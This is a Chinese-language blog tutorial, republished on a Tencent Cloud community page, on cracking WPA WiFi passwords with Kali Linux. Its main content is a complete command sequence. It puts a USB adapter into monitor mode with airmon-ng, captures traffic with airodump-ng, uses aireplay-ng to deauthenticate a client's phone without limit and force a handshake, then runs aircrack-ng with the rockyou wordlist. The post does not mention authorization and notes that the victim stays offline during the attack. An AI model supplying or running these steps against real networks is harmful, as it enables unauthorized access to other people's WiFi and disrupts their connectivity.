前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >详细介绍如何破解WiFi密全过程

详细介绍如何破解WiFi密全过程

作者头像
知识与交流
发布2021-04-02 15:02:04
4.2K0
发布2021-04-02 15:02:04
举报
文章被收录于专栏:黑客技术家园

一.打开终端,用airmon-ng命令查看

如果出现无法访问…没有那个文件或目录 解决办法:先在window主机上按win+r键然后输入services.msc 回车

找到VMware USB Arbitration Service,双击

1.启动类型改为自动 …2.启动服务状态 …3.确定

二.打开虚拟机的设置,改成跟下图中2一样(如果为灰色无法更改,则需要关闭kail系统后再改)

将usb无线网卡插在电脑上,(注意:网卡芯片为3070或者8187L,买的时候要注意) 点击 虚拟机 -> 可移动设备 -> 选择那个有WLAN的 -> 连接

三.命令ifconfig查看网卡信息,有wlan0表示连接成功

四.命令airmon-ng start wlan0开启网卡监听模式

五.输入iwconfig命令查看网卡信息, wlan0mon网卡名加了mon则表示成功

六.命令airodump-ng wlan0mon,开始扫描WiFi,按ctrl+c结束任务

BSSID为wifi的MAC地址,PWR为信号强弱程度,数值越小信号越强;#DATA为数据量,越大使用的人就越多,CH为信道频率(频道),ESSID为wifi的名称,中文可能会有乱码

七,接着输入airodump-ng --bssid BSSID -c 信道频率 -w 抓包存储的路径 wlan0mon

如:airodump-ng --bssid BC:5F:6F:3D:03:74 -c 13 -w /home/wifi wlan0mon

数据包已经正在抓取 如果抓取不到数据,新建一个终端:键入airepaly-ng -0 0 -c 连接到WiFi的手机mac地址 -a bssid 网卡名(一般为wlan0mon)

如:aireplay-ng -0 0 -c B8:37:65:94:5D:13 -a BC:5F:6F:3D:03:74 wlan0mon

(0 WiFi设备无限次数,-0 8则攻击8次。攻击原理是:先让设备掉线,设备会再自动连接,并发这个自动连接过程会进行三次握手,会发送tcp包(里面包含加密的密码数据),我方伪装成WiFi热点去窃取该数据包。我方窃取后即可用字典穷举法暴力破解加密的WiFi密码, 数据包里面的密码是哈希加密的,哈希加密只能正向)

出现WPA handshake时,表示抓包成功

两个终端都按Ctrl+c停止,不然那边会一直断网的

cd打开抓包的目录,ls列出来,就看到我们抓到的数据包

八.解压kali自带的字典文件 路径:/usr/share/wordlists/rockyou.txt.gz

如 :gzip -d/usr/share/wordlists/rockyou.txt.gz

九.键入 aircrack-ng -w 字典路径 握手包路径,回车后开始爆破

如:aircrack-ng -w /usr/share/wordlists/rockyou.txt /home/wifi-0.1.cap

耐心等待密码破解吧…

特别说明:暴力破解并不简单,需要足够强大的字典和时间,可以通过字典生成工具生成自己的字典,字典越强大越容易破解。。哈哈,也是需要点运气的!

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2021-01-03,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 黑客技术家园 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 一.打开终端,用airmon-ng命令查看
  • 二.打开虚拟机的设置,改成跟下图中2一样(如果为灰色无法更改,则需要关闭kail系统后再改)
  • 三.命令ifconfig查看网卡信息,有wlan0表示连接成功
  • 四.命令airmon-ng start wlan0开启网卡监听模式
  • 五.输入iwconfig命令查看网卡信息, wlan0mon网卡名加了mon则表示成功
  • 六.命令airodump-ng wlan0mon,开始扫描WiFi,按ctrl+c结束任务
  • 七,接着输入airodump-ng --bssid BSSID -c 信道频率 -w 抓包存储的路径 wlan0mon
    • 如:airodump-ng --bssid BC:5F:6F:3D:03:74 -c 13 -w /home/wifi wlan0mon
      • 如:aireplay-ng -0 0 -c B8:37:65:94:5D:13 -a BC:5F:6F:3D:03:74 wlan0mon
        • 出现WPA handshake时,表示抓包成功
          • 两个终端都按Ctrl+c停止,不然那边会一直断网的
          • 八.解压kali自带的字典文件 路径:/usr/share/wordlists/rockyou.txt.gz
            • 如 :gzip -d/usr/share/wordlists/rockyou.txt.gz
            • 九.键入 aircrack-ng -w 字典路径 握手包路径,回车后开始爆破
              • 如:aircrack-ng -w /usr/share/wordlists/rockyou.txt /home/wifi-0.1.cap
              • 特别说明:暴力破解并不简单,需要足够强大的字典和时间,可以通过字典生成工具生成自己的字典,字典越强大越容易破解。。哈哈,也是需要点运气的!
              领券
              问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档